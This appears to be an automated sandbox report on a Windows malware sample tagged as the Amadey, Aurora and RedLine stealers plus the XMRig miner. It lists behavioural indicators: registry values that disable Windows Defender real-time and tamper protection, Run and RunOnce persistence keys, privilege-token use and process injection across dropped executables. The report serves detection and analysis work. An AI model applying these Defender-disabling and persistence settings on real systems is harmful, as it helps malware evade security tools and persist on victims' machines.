Malware Analysis Report

2024-11-30 23:13

Sample ID 230224-3v6hfabd48
Target da7ea5bbdbda4355c08dee33105a2577f239cb3cf44a0a45a7a2f2d90e1e5c2e
SHA256 da7ea5bbdbda4355c08dee33105a2577f239cb3cf44a0a45a7a2f2d90e1e5c2e
Tags
amadey aurora redline xmrig frukt rodik discovery evasion infostealer miner persistence spyware stealer trojan
score
10/10

Table of Contents

Analysis Overview

MITRE ATT&CK

Enterprise Matrix V6

Analysis: static1

Detonation Overview

Signatures

Analysis: behavioral1

Detonation Overview

Command Line

Signatures

Processes

Network

Files

Analysis Overview

score
10/10

SHA256

da7ea5bbdbda4355c08dee33105a2577f239cb3cf44a0a45a7a2f2d90e1e5c2e

Threat Level: Known bad

The file da7ea5bbdbda4355c08dee33105a2577f239cb3cf44a0a45a7a2f2d90e1e5c2e was found to be: Known bad.

Malicious Activity Summary

amadey aurora redline xmrig frukt rodik discovery evasion infostealer miner persistence spyware stealer trojan

Amadey

Aurora

RedLine payload

Modifies Windows Defender Real-time Protection settings

RedLine

xmrig

XMRig Miner payload

Downloads MZ/PE file

Reads user/profile data of web browsers

Executes dropped EXE

Windows security modification

Loads dropped DLL

Checks installed software on the system

Adds Run key to start application

Accesses cryptocurrency files/wallets, possible credential harvesting

Suspicious use of SetThreadContext

Program crash

Enumerates physical storage devices

Creates scheduled task(s)

Suspicious use of AdjustPrivilegeToken

Suspicious use of FindShellTrayWindow

Suspicious use of WriteProcessMemory

Suspicious behavior: EnumeratesProcesses

Suspicious behavior: LoadsDriver

MITRE ATT&CK

Analysis: static1

Detonation Overview

Reported

2023-02-24 23:51

Signatures

N/A

Analysis: behavioral1

Detonation Overview

Submitted

2023-02-24 23:51

Reported

2023-02-24 23:53

Platform

win10-20230220-en

Max time kernel

146s

Max time network

150s

Command Line

"C:\Users\Admin\AppData\Local\Temp\da7ea5bbdbda4355c08dee33105a2577f239cb3cf44a0a45a7a2f2d90e1e5c2e.exe"

Signatures

Amadey

trojan amadey

Aurora

stealer aurora

Modifies Windows Defender Real-time Protection settings

evasion trojan
Description Indicator Process Target
Set value (int) \REGISTRY\MACHINE\SOFTWARE\Policies\Microsoft\Windows Defender\Real-Time Protection\DisableRealtimeMonitoring = "1" C:\Users\Admin\AppData\Local\Temp\IXP003.TMP\iTc67ii.exe N/A
Set value (int) \REGISTRY\MACHINE\SOFTWARE\Policies\Microsoft\Windows Defender\Real-Time Protection\DisableScanOnRealtimeEnable = "1" C:\Users\Admin\AppData\Local\Temp\IXP003.TMP\iTc67ii.exe N/A
Set value (int) \REGISTRY\MACHINE\SOFTWARE\Policies\Microsoft\Windows Defender\Real-Time Protection\DisableIOAVProtection = "1" C:\Users\Admin\AppData\Local\Temp\IXP002.TMP\mfA59vf.exe N/A
Set value (int) \REGISTRY\MACHINE\SOFTWARE\Policies\Microsoft\Windows Defender\Real-Time Protection\DisableOnAccessProtection = "1" C:\Users\Admin\AppData\Local\Temp\IXP002.TMP\mfA59vf.exe N/A
Set value (int) \REGISTRY\MACHINE\SOFTWARE\Policies\Microsoft\Windows Defender\Real-Time Protection\DisableScanOnRealtimeEnable = "1" C:\Users\Admin\AppData\Local\Temp\IXP002.TMP\mfA59vf.exe N/A
Set value (int) \REGISTRY\MACHINE\SOFTWARE\Policies\Microsoft\Windows Defender\Real-Time Protection\DisableBehaviorMonitoring = "1" C:\Users\Admin\AppData\Local\Temp\IXP003.TMP\iTc67ii.exe N/A
Set value (int) \REGISTRY\MACHINE\SOFTWARE\Policies\Microsoft\Windows Defender\Real-Time Protection\DisableIOAVProtection = "1" C:\Users\Admin\AppData\Local\Temp\IXP003.TMP\iTc67ii.exe N/A
Set value (int) \REGISTRY\MACHINE\SOFTWARE\Policies\Microsoft\Windows Defender\Real-Time Protection\DisableOnAccessProtection = "1" C:\Users\Admin\AppData\Local\Temp\IXP003.TMP\iTc67ii.exe N/A
Set value (int) \REGISTRY\MACHINE\SOFTWARE\Policies\Microsoft\Windows Defender\Real-Time Protection\DisableBehaviorMonitoring = "1" C:\Users\Admin\AppData\Local\Temp\IXP002.TMP\mfA59vf.exe N/A
Set value (int) \REGISTRY\MACHINE\SOFTWARE\Policies\Microsoft\Windows Defender\Real-Time Protection\DisableRealtimeMonitoring = "1" C:\Users\Admin\AppData\Local\Temp\IXP002.TMP\mfA59vf.exe N/A

RedLine

infostealer redline

RedLine payload

Description Indicator Process Target
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A

xmrig

miner xmrig

XMRig Miner payload

miner
Description Indicator Process Target
N/A N/A N/A N/A
N/A N/A N/A N/A

Downloads MZ/PE file

Loads dropped DLL

Description Indicator Process Target
N/A N/A C:\Windows\SysWOW64\rundll32.exe N/A
N/A N/A C:\Windows\SysWOW64\rundll32.exe N/A
N/A N/A C:\Windows\system32\rundll32.exe N/A
N/A N/A C:\Windows\SysWOW64\rundll32.exe N/A

Reads user/profile data of web browsers

spyware stealer

Windows security modification

evasion trojan
Description Indicator Process Target
Set value (int) \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\Windows Defender\Features\TamperProtection = "0" C:\Users\Admin\AppData\Local\Temp\IXP002.TMP\mfA59vf.exe N/A
Set value (int) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows Defender\Features\TamperProtection = "0" C:\Users\Admin\AppData\Local\Temp\IXP003.TMP\iTc67ii.exe N/A
Key created \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\Windows Defender\Features C:\Users\Admin\AppData\Local\Temp\IXP002.TMP\mfA59vf.exe N/A

Accesses cryptocurrency files/wallets, possible credential harvesting

spyware

Adds Run key to start application

persistence
Description Indicator Process Target
Key created \REGISTRY\MACHINE\Software\WOW6432Node\Microsoft\Windows\CurrentVersion\RunOnce C:\Users\Admin\AppData\Local\Temp\1000020051\prima.exe N/A
Set value (str) \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\Windows\CurrentVersion\RunOnce\wextract_cleanup0 = "rundll32.exe C:\\Windows\\system32\\advpack.dll,DelNodeRunDLL32 \"C:\\Users\\Admin\\AppData\\Local\\Temp\\IXP004.TMP\\\"" C:\Users\Admin\AppData\Local\Temp\1000020051\prima.exe N/A
Set value (str) \REGISTRY\USER\S-1-5-21-1311743041-1167936498-546579926-1000\Software\Microsoft\Windows\CurrentVersion\Run\Hedtgoupb.exe = "\"C:\\Users\\Admin\\AppData\\Roaming\\Hedtgoupb.exe\"" C:\Users\Admin\AppData\Local\Temp\1000280001\Hedtgoupb.exe N/A
Key created \REGISTRY\MACHINE\Software\WOW6432Node\Microsoft\Windows\CurrentVersion\RunOnce C:\Users\Admin\AppData\Local\Temp\da7ea5bbdbda4355c08dee33105a2577f239cb3cf44a0a45a7a2f2d90e1e5c2e.exe N/A
Key created \REGISTRY\MACHINE\Software\WOW6432Node\Microsoft\Windows\CurrentVersion\RunOnce C:\Users\Admin\AppData\Local\Temp\IXP000.TMP\sMd69eR69.exe N/A
Key created \REGISTRY\MACHINE\Software\WOW6432Node\Microsoft\Windows\CurrentVersion\RunOnce C:\Users\Admin\AppData\Local\Temp\IXP001.TMP\seR20tx67.exe N/A
Key created \REGISTRY\MACHINE\Software\WOW6432Node\Microsoft\Windows\CurrentVersion\RunOnce C:\Users\Admin\AppData\Local\Temp\IXP002.TMP\shQ07NY07.exe N/A
Set value (str) \REGISTRY\USER\S-1-5-21-1311743041-1167936498-546579926-1000\Software\Microsoft\Windows\CurrentVersion\Run\prima.exe = "C:\\Users\\Admin\\AppData\\Local\\Temp\\1000020051\\prima.exe" C:\Users\Admin\AppData\Local\Temp\4f9dd6f8a7\mnolyk.exe N/A
Set value (str) \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\Windows\CurrentVersion\RunOnce\wextract_cleanup0 = "rundll32.exe C:\\Windows\\system32\\advpack.dll,DelNodeRunDLL32 \"C:\\Users\\Admin\\AppData\\Local\\Temp\\IXP000.TMP\\\"" C:\Users\Admin\AppData\Local\Temp\da7ea5bbdbda4355c08dee33105a2577f239cb3cf44a0a45a7a2f2d90e1e5c2e.exe N/A
Set value (str) \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\Windows\CurrentVersion\RunOnce\wextract_cleanup1 = "rundll32.exe C:\\Windows\\system32\\advpack.dll,DelNodeRunDLL32 \"C:\\Users\\Admin\\AppData\\Local\\Temp\\IXP001.TMP\\\"" C:\Users\Admin\AppData\Local\Temp\IXP000.TMP\sMd69eR69.exe N/A
Set value (str) \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\Windows\CurrentVersion\RunOnce\wextract_cleanup2 = "rundll32.exe C:\\Windows\\system32\\advpack.dll,DelNodeRunDLL32 \"C:\\Users\\Admin\\AppData\\Local\\Temp\\IXP002.TMP\\\"" C:\Users\Admin\AppData\Local\Temp\IXP001.TMP\seR20tx67.exe N/A
Set value (str) \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\Windows\CurrentVersion\RunOnce\wextract_cleanup3 = "rundll32.exe C:\\Windows\\system32\\advpack.dll,DelNodeRunDLL32 \"C:\\Users\\Admin\\AppData\\Local\\Temp\\IXP003.TMP\\\"" C:\Users\Admin\AppData\Local\Temp\IXP002.TMP\shQ07NY07.exe N/A

Checks installed software on the system

discovery

Suspicious use of SetThreadContext

Description Indicator Process Target
PID 3516 set thread context of 3996 N/A C:\Users\Admin\AppData\Local\Temp\1000280001\Hedtgoupb.exe C:\Windows\Microsoft.NET\Framework64\v4.0.30319\AddInProcess.exe

Enumerates physical storage devices

Program crash

Description Indicator Process Target
N/A N/A C:\Windows\system32\WerFault.exe C:\Windows\system32\rundll32.exe

Creates scheduled task(s)

persistence
Description Indicator Process Target
N/A N/A C:\Windows\SysWOW64\schtasks.exe N/A
N/A N/A C:\Windows\SysWOW64\schtasks.exe N/A

Suspicious behavior: EnumeratesProcesses

Description Indicator Process Target
N/A N/A C:\Users\Admin\AppData\Local\Temp\IXP003.TMP\iTc67ii.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\IXP003.TMP\iTc67ii.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\IXP003.TMP\ket87DV.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\IXP003.TMP\ket87DV.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\IXP002.TMP\mfA59vf.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\IXP002.TMP\mfA59vf.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\IXP001.TMP\njT68TW58.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\IXP001.TMP\njT68TW58.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\IXP004.TMP\eMl27er58.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\IXP004.TMP\eMl27er58.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\1000280001\Hedtgoupb.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\1000280001\Hedtgoupb.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\1000280001\Hedtgoupb.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\1000280001\Hedtgoupb.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\1000280001\Hedtgoupb.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\1000280001\Hedtgoupb.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\1000280001\Hedtgoupb.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\1000280001\Hedtgoupb.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\1000280001\Hedtgoupb.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\1000280001\Hedtgoupb.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\IXP004.TMP\nMq28wd95.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\IXP004.TMP\nMq28wd95.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\1000280001\Hedtgoupb.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\1000280001\Hedtgoupb.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\1000280001\Hedtgoupb.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\1000280001\Hedtgoupb.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\1000280001\Hedtgoupb.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\1000280001\Hedtgoupb.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\1000280001\Hedtgoupb.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\1000280001\Hedtgoupb.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\1000280001\Hedtgoupb.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\1000280001\Hedtgoupb.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\1000280001\Hedtgoupb.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\1000280001\Hedtgoupb.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\1000280001\Hedtgoupb.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\1000280001\Hedtgoupb.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\1000280001\Hedtgoupb.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\1000280001\Hedtgoupb.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\1000280001\Hedtgoupb.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\1000280001\Hedtgoupb.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\1000280001\Hedtgoupb.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\1000280001\Hedtgoupb.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\1000280001\Hedtgoupb.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\1000280001\Hedtgoupb.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\1000280001\Hedtgoupb.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\1000280001\Hedtgoupb.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\1000280001\Hedtgoupb.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\1000280001\Hedtgoupb.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\1000280001\Hedtgoupb.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\1000280001\Hedtgoupb.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\1000280001\Hedtgoupb.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\1000280001\Hedtgoupb.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\1000280001\Hedtgoupb.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\1000280001\Hedtgoupb.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\1000280001\Hedtgoupb.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\1000280001\Hedtgoupb.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\1000280001\Hedtgoupb.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\1000280001\Hedtgoupb.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\1000280001\Hedtgoupb.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\1000280001\Hedtgoupb.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\1000280001\Hedtgoupb.exe N/A

Suspicious behavior: LoadsDriver

Description Indicator Process Target
N/A N/A N/A N/A

Suspicious use of AdjustPrivilegeToken

Description Indicator Process Target
Token: SeDebugPrivilege N/A C:\Users\Admin\AppData\Local\Temp\IXP003.TMP\iTc67ii.exe N/A
Token: SeDebugPrivilege N/A C:\Users\Admin\AppData\Local\Temp\IXP003.TMP\ket87DV.exe N/A
Token: SeDebugPrivilege N/A C:\Users\Admin\AppData\Local\Temp\IXP002.TMP\mfA59vf.exe N/A
Token: SeDebugPrivilege N/A C:\Users\Admin\AppData\Local\Temp\IXP001.TMP\njT68TW58.exe N/A
Token: SeDebugPrivilege N/A C:\Users\Admin\AppData\Local\Temp\IXP004.TMP\eMl27er58.exe N/A
Token: SeIncreaseQuotaPrivilege N/A C:\Windows\SysWOW64\Wbem\wmic.exe N/A
Token: SeSecurityPrivilege N/A C:\Windows\SysWOW64\Wbem\wmic.exe N/A
Token: SeTakeOwnershipPrivilege N/A C:\Windows\SysWOW64\Wbem\wmic.exe N/A
Token: SeLoadDriverPrivilege N/A C:\Windows\SysWOW64\Wbem\wmic.exe N/A
Token: SeSystemProfilePrivilege N/A C:\Windows\SysWOW64\Wbem\wmic.exe N/A
Token: SeSystemtimePrivilege N/A C:\Windows\SysWOW64\Wbem\wmic.exe N/A
Token: SeProfSingleProcessPrivilege N/A C:\Windows\SysWOW64\Wbem\wmic.exe N/A
Token: SeIncBasePriorityPrivilege N/A C:\Windows\SysWOW64\Wbem\wmic.exe N/A
Token: SeCreatePagefilePrivilege N/A C:\Windows\SysWOW64\Wbem\wmic.exe N/A
Token: SeBackupPrivilege N/A C:\Windows\SysWOW64\Wbem\wmic.exe N/A
Token: SeRestorePrivilege N/A C:\Windows\SysWOW64\Wbem\wmic.exe N/A
Token: SeShutdownPrivilege N/A C:\Windows\SysWOW64\Wbem\wmic.exe N/A
Token: SeDebugPrivilege N/A C:\Windows\SysWOW64\Wbem\wmic.exe N/A
Token: SeSystemEnvironmentPrivilege N/A C:\Windows\SysWOW64\Wbem\wmic.exe N/A
Token: SeRemoteShutdownPrivilege N/A C:\Windows\SysWOW64\Wbem\wmic.exe N/A
Token: SeUndockPrivilege N/A C:\Windows\SysWOW64\Wbem\wmic.exe N/A
Token: SeManageVolumePrivilege N/A C:\Windows\SysWOW64\Wbem\wmic.exe N/A
Token: 33 N/A C:\Windows\SysWOW64\Wbem\wmic.exe N/A
Token: 34 N/A C:\Windows\SysWOW64\Wbem\wmic.exe N/A
Token: 35 N/A C:\Windows\SysWOW64\Wbem\wmic.exe N/A
Token: 36 N/A C:\Windows\SysWOW64\Wbem\wmic.exe N/A
Token: SeIncreaseQuotaPrivilege N/A C:\Windows\SysWOW64\Wbem\wmic.exe N/A
Token: SeSecurityPrivilege N/A C:\Windows\SysWOW64\Wbem\wmic.exe N/A
Token: SeTakeOwnershipPrivilege N/A C:\Windows\SysWOW64\Wbem\wmic.exe N/A
Token: SeLoadDriverPrivilege N/A C:\Windows\SysWOW64\Wbem\wmic.exe N/A
Token: SeSystemProfilePrivilege N/A C:\Windows\SysWOW64\Wbem\wmic.exe N/A
Token: SeSystemtimePrivilege N/A C:\Windows\SysWOW64\Wbem\wmic.exe N/A
Token: SeProfSingleProcessPrivilege N/A C:\Windows\SysWOW64\Wbem\wmic.exe N/A
Token: SeIncBasePriorityPrivilege N/A C:\Windows\SysWOW64\Wbem\wmic.exe N/A
Token: SeCreatePagefilePrivilege N/A C:\Windows\SysWOW64\Wbem\wmic.exe N/A
Token: SeBackupPrivilege N/A C:\Windows\SysWOW64\Wbem\wmic.exe N/A
Token: SeRestorePrivilege N/A C:\Windows\SysWOW64\Wbem\wmic.exe N/A
Token: SeShutdownPrivilege N/A C:\Windows\SysWOW64\Wbem\wmic.exe N/A
Token: SeDebugPrivilege N/A C:\Windows\SysWOW64\Wbem\wmic.exe N/A
Token: SeSystemEnvironmentPrivilege N/A C:\Windows\SysWOW64\Wbem\wmic.exe N/A
Token: SeRemoteShutdownPrivilege N/A C:\Windows\SysWOW64\Wbem\wmic.exe N/A
Token: SeUndockPrivilege N/A C:\Windows\SysWOW64\Wbem\wmic.exe N/A
Token: SeManageVolumePrivilege N/A C:\Windows\SysWOW64\Wbem\wmic.exe N/A
Token: 33 N/A C:\Windows\SysWOW64\Wbem\wmic.exe N/A
Token: 34 N/A C:\Windows\SysWOW64\Wbem\wmic.exe N/A
Token: 35 N/A C:\Windows\SysWOW64\Wbem\wmic.exe N/A
Token: 36 N/A C:\Windows\SysWOW64\Wbem\wmic.exe N/A
Token: SeIncreaseQuotaPrivilege N/A C:\Windows\SysWOW64\Wbem\WMIC.exe N/A
Token: SeSecurityPrivilege N/A C:\Windows\SysWOW64\Wbem\WMIC.exe N/A
Token: SeTakeOwnershipPrivilege N/A C:\Windows\SysWOW64\Wbem\WMIC.exe N/A
Token: SeLoadDriverPrivilege N/A C:\Windows\SysWOW64\Wbem\WMIC.exe N/A
Token: SeSystemProfilePrivilege N/A C:\Windows\SysWOW64\Wbem\WMIC.exe N/A
Token: SeSystemtimePrivilege N/A C:\Windows\SysWOW64\Wbem\WMIC.exe N/A
Token: SeProfSingleProcessPrivilege N/A C:\Windows\SysWOW64\Wbem\WMIC.exe N/A
Token: SeIncBasePriorityPrivilege N/A C:\Windows\SysWOW64\Wbem\WMIC.exe N/A
Token: SeCreatePagefilePrivilege N/A C:\Windows\SysWOW64\Wbem\WMIC.exe N/A
Token: SeBackupPrivilege N/A C:\Windows\SysWOW64\Wbem\WMIC.exe N/A
Token: SeRestorePrivilege N/A C:\Windows\SysWOW64\Wbem\WMIC.exe N/A
Token: SeShutdownPrivilege N/A C:\Windows\SysWOW64\Wbem\WMIC.exe N/A
Token: SeDebugPrivilege N/A C:\Windows\SysWOW64\Wbem\WMIC.exe N/A
Token: SeSystemEnvironmentPrivilege N/A C:\Windows\SysWOW64\Wbem\WMIC.exe N/A
Token: SeRemoteShutdownPrivilege N/A C:\Windows\SysWOW64\Wbem\WMIC.exe N/A
Token: SeUndockPrivilege N/A C:\Windows\SysWOW64\Wbem\WMIC.exe N/A
Token: SeManageVolumePrivilege N/A C:\Windows\SysWOW64\Wbem\WMIC.exe N/A

Suspicious use of FindShellTrayWindow

Description Indicator Process Target
N/A N/A C:\Windows\Microsoft.NET\Framework64\v4.0.30319\AddInProcess.exe N/A

Suspicious use of WriteProcessMemory

Description Indicator Process Target
PID 2268 wrote to memory of 2488 N/A C:\Users\Admin\AppData\Local\Temp\da7ea5bbdbda4355c08dee33105a2577f239cb3cf44a0a45a7a2f2d90e1e5c2e.exe C:\Users\Admin\AppData\Local\Temp\IXP000.TMP\sMd69eR69.exe
PID 2268 wrote to memory of 2488 N/A C:\Users\Admin\AppData\Local\Temp\da7ea5bbdbda4355c08dee33105a2577f239cb3cf44a0a45a7a2f2d90e1e5c2e.exe C:\Users\Admin\AppData\Local\Temp\IXP000.TMP\sMd69eR69.exe
PID 2268 wrote to memory of 2488 N/A C:\Users\Admin\AppData\Local\Temp\da7ea5bbdbda4355c08dee33105a2577f239cb3cf44a0a45a7a2f2d90e1e5c2e.exe C:\Users\Admin\AppData\Local\Temp\IXP000.TMP\sMd69eR69.exe
PID 2488 wrote to memory of 2592 N/A C:\Users\Admin\AppData\Local\Temp\IXP000.TMP\sMd69eR69.exe C:\Users\Admin\AppData\Local\Temp\IXP001.TMP\seR20tx67.exe
PID 2488 wrote to memory of 2592 N/A C:\Users\Admin\AppData\Local\Temp\IXP000.TMP\sMd69eR69.exe C:\Users\Admin\AppData\Local\Temp\IXP001.TMP\seR20tx67.exe
PID 2488 wrote to memory of 2592 N/A C:\Users\Admin\AppData\Local\Temp\IXP000.TMP\sMd69eR69.exe C:\Users\Admin\AppData\Local\Temp\IXP001.TMP\seR20tx67.exe
PID 2592 wrote to memory of 3176 N/A C:\Users\Admin\AppData\Local\Temp\IXP001.TMP\seR20tx67.exe C:\Users\Admin\AppData\Local\Temp\IXP002.TMP\shQ07NY07.exe
PID 2592 wrote to memory of 3176 N/A C:\Users\Admin\AppData\Local\Temp\IXP001.TMP\seR20tx67.exe C:\Users\Admin\AppData\Local\Temp\IXP002.TMP\shQ07NY07.exe
PID 2592 wrote to memory of 3176 N/A C:\Users\Admin\AppData\Local\Temp\IXP001.TMP\seR20tx67.exe C:\Users\Admin\AppData\Local\Temp\IXP002.TMP\shQ07NY07.exe
PID 3176 wrote to memory of 4928 N/A C:\Users\Admin\AppData\Local\Temp\IXP002.TMP\shQ07NY07.exe C:\Users\Admin\AppData\Local\Temp\IXP003.TMP\iTc67ii.exe
PID 3176 wrote to memory of 4928 N/A C:\Users\Admin\AppData\Local\Temp\IXP002.TMP\shQ07NY07.exe C:\Users\Admin\AppData\Local\Temp\IXP003.TMP\iTc67ii.exe
PID 3176 wrote to memory of 3020 N/A C:\Users\Admin\AppData\Local\Temp\IXP002.TMP\shQ07NY07.exe C:\Users\Admin\AppData\Local\Temp\IXP003.TMP\ket87DV.exe
PID 3176 wrote to memory of 3020 N/A C:\Users\Admin\AppData\Local\Temp\IXP002.TMP\shQ07NY07.exe C:\Users\Admin\AppData\Local\Temp\IXP003.TMP\ket87DV.exe
PID 3176 wrote to memory of 3020 N/A C:\Users\Admin\AppData\Local\Temp\IXP002.TMP\shQ07NY07.exe C:\Users\Admin\AppData\Local\Temp\IXP003.TMP\ket87DV.exe
PID 2592 wrote to memory of 1132 N/A C:\Users\Admin\AppData\Local\Temp\IXP001.TMP\seR20tx67.exe C:\Users\Admin\AppData\Local\Temp\IXP002.TMP\mfA59vf.exe
PID 2592 wrote to memory of 1132 N/A C:\Users\Admin\AppData\Local\Temp\IXP001.TMP\seR20tx67.exe C:\Users\Admin\AppData\Local\Temp\IXP002.TMP\mfA59vf.exe
PID 2592 wrote to memory of 1132 N/A C:\Users\Admin\AppData\Local\Temp\IXP001.TMP\seR20tx67.exe C:\Users\Admin\AppData\Local\Temp\IXP002.TMP\mfA59vf.exe
PID 2488 wrote to memory of 4728 N/A C:\Users\Admin\AppData\Local\Temp\IXP000.TMP\sMd69eR69.exe C:\Users\Admin\AppData\Local\Temp\IXP001.TMP\njT68TW58.exe
PID 2488 wrote to memory of 4728 N/A C:\Users\Admin\AppData\Local\Temp\IXP000.TMP\sMd69eR69.exe C:\Users\Admin\AppData\Local\Temp\IXP001.TMP\njT68TW58.exe
PID 2488 wrote to memory of 4728 N/A C:\Users\Admin\AppData\Local\Temp\IXP000.TMP\sMd69eR69.exe C:\Users\Admin\AppData\Local\Temp\IXP001.TMP\njT68TW58.exe
PID 2268 wrote to memory of 4320 N/A C:\Users\Admin\AppData\Local\Temp\da7ea5bbdbda4355c08dee33105a2577f239cb3cf44a0a45a7a2f2d90e1e5c2e.exe C:\Users\Admin\AppData\Local\Temp\IXP000.TMP\rpG00SD91.exe
PID 2268 wrote to memory of 4320 N/A C:\Users\Admin\AppData\Local\Temp\da7ea5bbdbda4355c08dee33105a2577f239cb3cf44a0a45a7a2f2d90e1e5c2e.exe C:\Users\Admin\AppData\Local\Temp\IXP000.TMP\rpG00SD91.exe
PID 2268 wrote to memory of 4320 N/A C:\Users\Admin\AppData\Local\Temp\da7ea5bbdbda4355c08dee33105a2577f239cb3cf44a0a45a7a2f2d90e1e5c2e.exe C:\Users\Admin\AppData\Local\Temp\IXP000.TMP\rpG00SD91.exe
PID 4320 wrote to memory of 3768 N/A C:\Users\Admin\AppData\Local\Temp\IXP000.TMP\rpG00SD91.exe C:\Users\Admin\AppData\Local\Temp\4f9dd6f8a7\mnolyk.exe
PID 4320 wrote to memory of 3768 N/A C:\Users\Admin\AppData\Local\Temp\IXP000.TMP\rpG00SD91.exe C:\Users\Admin\AppData\Local\Temp\4f9dd6f8a7\mnolyk.exe
PID 4320 wrote to memory of 3768 N/A C:\Users\Admin\AppData\Local\Temp\IXP000.TMP\rpG00SD91.exe C:\Users\Admin\AppData\Local\Temp\4f9dd6f8a7\mnolyk.exe
PID 3768 wrote to memory of 4232 N/A C:\Users\Admin\AppData\Local\Temp\4f9dd6f8a7\mnolyk.exe C:\Windows\SysWOW64\schtasks.exe
PID 3768 wrote to memory of 4232 N/A C:\Users\Admin\AppData\Local\Temp\4f9dd6f8a7\mnolyk.exe C:\Windows\SysWOW64\schtasks.exe
PID 3768 wrote to memory of 4232 N/A C:\Users\Admin\AppData\Local\Temp\4f9dd6f8a7\mnolyk.exe C:\Windows\SysWOW64\schtasks.exe
PID 3768 wrote to memory of 3296 N/A C:\Users\Admin\AppData\Local\Temp\4f9dd6f8a7\mnolyk.exe C:\Windows\SysWOW64\cmd.exe
PID 3768 wrote to memory of 3296 N/A C:\Users\Admin\AppData\Local\Temp\4f9dd6f8a7\mnolyk.exe C:\Windows\SysWOW64\cmd.exe
PID 3768 wrote to memory of 3296 N/A C:\Users\Admin\AppData\Local\Temp\4f9dd6f8a7\mnolyk.exe C:\Windows\SysWOW64\cmd.exe
PID 3296 wrote to memory of 4216 N/A C:\Windows\SysWOW64\cmd.exe C:\Windows\SysWOW64\cmd.exe
